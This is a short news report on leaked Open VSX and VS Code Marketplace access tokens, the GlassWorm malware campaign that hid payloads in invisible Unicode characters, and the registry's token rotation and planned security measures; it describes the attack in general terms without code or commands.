Securing the Supply Chain: Safeguarding Access Tokens in Open VSX

The Open VSX registry took action to secure access tokens following an accidental leak by developers in public repositories. This leak allowed threat actors to publish malicious extensions in a supply chain attack. Wiz researchers discovered the leak two weeks ago, revealing over 550 exposed secrets across Microsoft VSCode and Open VSX marketplaces. Some of these secrets provided access to projects with 150,000 downloads, enabling threat actors to upload harmful extension versions, posing a significant supply chain risk.

Developed under the Eclipse Foundation, Open VSX is an open-source alternative to Microsoft’s Visual Studio Marketplace. It functions as a community-driven registry for VS Code-compatible extensions for use on AI-powered forks like Cursor and Windsurf. Following the leak, some tokens were used in a malware campaign named ‘GlassWorm’.

Koi Security researchers reported that GlassWorm deployed self-spreading malware disguised within invisible Unicode characters. This malware aimed to steal developer credentials and trigger breaches across reachable projects. Notably, the attacks targeted cryptocurrency wallet data from 49 extensions, indicating a potential financial motive.

The Eclipse Foundation and the Open VSX team addressed the incident through a blog post, clarifying that GlassWorm was not self-replicating but did target developer credentials. The malicious extensions were promptly removed from the Open VSX registry, and associated tokens were rotated or revoked to contain the threat.

To enhance security, Open VSX plans to implement several measures, including shortening token lifetimes, introducing faster revocation workflows, conducting automated security scans for extensions, and collaborating with other marketplaces to share threat intelligence.

While the threat was contained within Open VSX, Aikido reported that the same threat actors have shifted their focus to GitHub. They are using the same steganography trick to hide their malicious payload within Unicode characters. This operation has spread to multiple repositories, primarily centered on JavaScript projects.

As the threat actors pivot to GitHub, it underscores the ongoing risk in open-source ecosystems. The swift rotation through different platforms highlights the need for continued vigilance and enhanced security measures across all development environments.